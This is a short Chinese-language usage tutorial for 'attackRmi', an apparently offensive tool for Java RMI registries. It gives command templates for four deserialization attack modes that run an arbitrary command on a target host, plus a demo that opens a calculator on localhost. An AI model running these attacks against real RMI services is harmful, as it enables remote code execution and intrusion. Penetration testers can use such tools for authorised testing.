attackRmi 项目使用教程

attackRmi 项目使用教程

1. 项目目录结构及介绍

attackRmi 项目的目录结构如下：

attackRmi/
├── src/
│   └── (源代码文件)
├── .gitignore
├── LICENSE
├── README.md
├── README_zh.md
└── attackRmi.jar

目录结构介绍

• src/: 包含项目的源代码文件。
• .gitignore: 指定 Git 版本控制系统忽略的文件和目录。
• LICENSE: 项目的许可证文件，采用 Apache-2.0 许可证。
• README.md: 项目的英文介绍文档。
• README_zh.md: 项目的中文介绍文档。
• attackRmi.jar: 项目的可执行 JAR 文件。

2. 项目启动文件介绍

attackRmi 项目的启动文件是 attackRmi.jar。该文件是一个可执行的 JAR 文件，可以通过命令行启动。

启动命令示例

以下是一些启动命令的示例：

• 通过 DGC 攻击:

  java -jar attackRmi.jar DOL [registryHost] [registryPort] '[command]'
  

• 通过 LookupAndUnicastRef 攻击:

  java -jar attackRmi.jar LAU [registryHost] [registryPort] [JRMPListenHost] [JRMPListenPort]
  

• 通过 LookupAndUnicastRefRemoteObject 攻击:

  java -jar attackRmi.jar LAUS [registryHost] [registryPort] [serverIp] [startPort] '[command]'
  

• 通过 NonPrimitiveParameter 攻击:

  java -jar attackRmi.jar NPP [registryHost] [registryPort] [name] '[methodSignature]' '[command]'
  

3. 项目配置文件介绍

attackRmi 项目没有显式的配置文件，所有的配置和参数都通过命令行参数传递。以下是一些常用的命令行参数：

• registryHost: RMI 注册表的主机地址。
• registryPort: RMI 注册表的端口号。
• command: 要执行的命令。
• JRMPListenHost: JRMP 监听的主机地址。
• JRMPListenPort: JRMP 监听的端口号。
• name: 服务名称。
• methodSignature: 方法签名。

示例配置

java -jar attackRmi.jar DOL 127.0.0.1 1099 'open /System/Applications/Calculator.app'

以上命令将在 127.0.0.1 的 1099 端口上执行 open /System/Applications/Calculator.app 命令。

---

通过以上教程，您应该能够了解 attackRmi 项目的目录结构、启动文件以及如何通过命令行参数进行配置和启动。